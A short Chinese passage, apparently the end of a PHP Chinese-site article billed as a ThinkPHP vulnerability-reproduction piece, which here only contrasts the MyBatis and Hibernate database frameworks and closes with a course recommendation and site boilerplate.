于是就誕生出了Mybatis半自動(dòng)框架與Hibernate全自動(dòng)框架，直接將jdbc的操作進(jìn)行封裝，但是由于全自動(dòng)框架可操作性過于狹窄，所以現(xiàn)在市面上更多的還是Mybatis框架進(jìn)行連接服務(wù)端與數(shù)據(jù)庫，但是一般政府或國企的項(xiàng)目還是偏向于Hibernate框架，這些知識(shí)都是涉及一些編程知識(shí)，大家可以自己去了解一下。

推薦學(xué)習(xí)：《PHP視頻教程》

以上是滲透測試之路：ThinkPHP漏洞復(fù)現(xiàn)的詳細(xì)內(nèi)容。更多資訊請關(guān)注PHP中文網(wǎng)其他相關(guān)文章！